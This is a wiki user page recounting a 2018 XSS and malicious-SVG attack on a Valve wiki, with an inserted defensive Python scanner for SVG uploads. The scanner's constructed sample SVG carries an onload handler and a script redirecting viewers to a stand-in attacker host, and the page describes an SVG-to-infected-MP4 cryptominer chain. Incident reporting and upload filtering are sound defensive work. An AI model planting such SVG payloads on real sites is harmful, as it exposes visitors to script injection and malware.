User:Pinsplash/Early July 2018 hacking incident: Difference between revisions
Revision as of 21:21, 5 July 2018
You have probably heard about the wiki recently having a hacker attack, or maybe you saw that maintenance message. Here's what's up:
June 24
User:Kendyhikaru attempts and fails to put an XSS script on Help:Contents. We did not raise hell about this because it was an obvious failure. I know, like 500 people are going to think that was dumb, but chill.
Late June 3 night
I checked Special:RecentChanges and noticed User:SuicideJoy uploading a lot of suspicious content. Immediately I asked other people about this (personal wiki discord and Thinking With Portals) because this attack seemed a lot more legitimate. User:Ficool2 and many other people investigated on virtual machines, phones, etc.
- Whatever the images uploaded were, they didn't do anything.
- The 100,000 bytes of text uploaded was XSS scripts that failed due to the wiki software's fairly good security features. If the scripts worked, it would have been immediately obvious because viewing the page would have created many popup messages. We have found that SuicideJoy took that stuff straight from a YouTube video.
- Seeing the scripts did not work, SuicideJoy blanked the page and then linked to an SVG on another domain (possibly a domain they owned; the URL was to some Russian hacking website). This SVG had a JavaScript script embedded in it that would attempt to load a webpage containing an infected MP4 that automatically plays. This MP4 would then send bitcoin-mining malware to a victim's computer. (Confirm: Did or did this not work?)
At that moment, there was no site-wide threat. We started spreading word to other communities because it could have become worse, and it did. I sent an email to User:JeffLane a short time after first finding this activity.
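The SVG step above is the one a wiki upload filter can catch before the file is ever served. This is an added example (not the wiki's or MediaWiki's own code) of such a check: it walks an SVG document and reports script elements, on* event handlers, javascript: URIs and references to external hosts. The sample SVG and the attacker.example hostname are constructed for the example.

```python
"""Flag SVG uploads that carry active content (added example, not wiki code)."""
import re
import xml.etree.ElementTree as ET

ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
URL_ATTRS = {"href", "src", "data"}   # covers xlink:href after namespace strip


def _local(name):
    # Strip the namespace from '{ns}name' so 'script' matches '{svg}script'.
    return name.rsplit("}", 1)[-1]


def scan_svg(svg_text):
    """Return a list of (reason, element, value) findings; empty means clean."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as err:
        # A file that does not parse as XML is rejected too, not waved through.
        return [("unparseable", "", str(err))]
    findings = []
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_TAGS:
            findings.append(("active element", name, ""))
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):
                findings.append(("event handler", name, aname))
            elif aname in URL_ATTRS:
                v = value.strip().lower()
                if v.startswith("javascript:"):
                    findings.append(("script URI", name, value))
                elif re.match(r"^(https?:)?//", v):
                    findings.append(("external reference", name, value))
    return findings


def is_safe_svg(svg_text):
    return not scan_svg(svg_text)


# Constructed sample: an SVG whose script sends the viewer to an off-site page.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">
  <script>window.location = "https://attacker.example/autoplay.html";</script>
  <image xlink:href="https://attacker.example/frame.png" width="1" height="1"/>
  <rect width="10" height="10"/>
</svg>"""
CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'

if __name__ == "__main__":
    for reason, element, value in scan_svg(SAMPLE_SVG):
        print(f"{reason}: <{element}> {value}")
```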
July 4
Early morning
As we started to realize that this threat was smaller than we initially thought, some of us were calling it safe. I was aware that many communities were still waiting for Valve to confirm to anybody that the wiki was safe, so I sent a more direct email to Valve's security personnel (security@valvesoftware.com).
Morning
About 45 minutes after others and I said it was safe, User:Valvedev (probably SuicideJoy on another account) started uploading random things, and this time we confirmed they had working XSS. I sent yet another email to security@valvesoftware.com telling them about this.
Late evening
Valve put a site-wide redirect to a page notifying that they were doing... "maintenance" to the wiki.
Night of July 5
Valve employee Gabe Van Engel (User:Gvengel) is seen blanking his user page. Within 4 hours of that, the maintenance notice on the wiki was removed.
So far:
- MediaWiki software updated from 1.23.4 (a version considered OBSOLETE, released September 24, 2014) to 1.27.4 (a legacy version, released November 14, 2017). (Note: The most recent wiki version is 1.31. There is a 1.32 in alpha.)
- Neither User:SuicideJoy nor User:Valvedev have been blocked from the site.
- I still haven't had word from anyone at Valve, and Engel is probably offline for the night.
- We still do not have direct 100% confirmation that the wiki is safe. (Personally I don't think there's a site-wide threat, just don't visit any suspicious-looking pages.)
Please actually give us something Valve. It seems even you guys are unsure if this site is worth any of our time right now.
We have (fuck knows how many) users, images, and pages that need to be blocked/deleted but never have. Until just tonight, the wiki has not had any sign of life from a sysop since May 2017. Let that sink in. The wiki has not been properly managed for over a year. (I made that clear in my email to Jeff Lane, by the way.)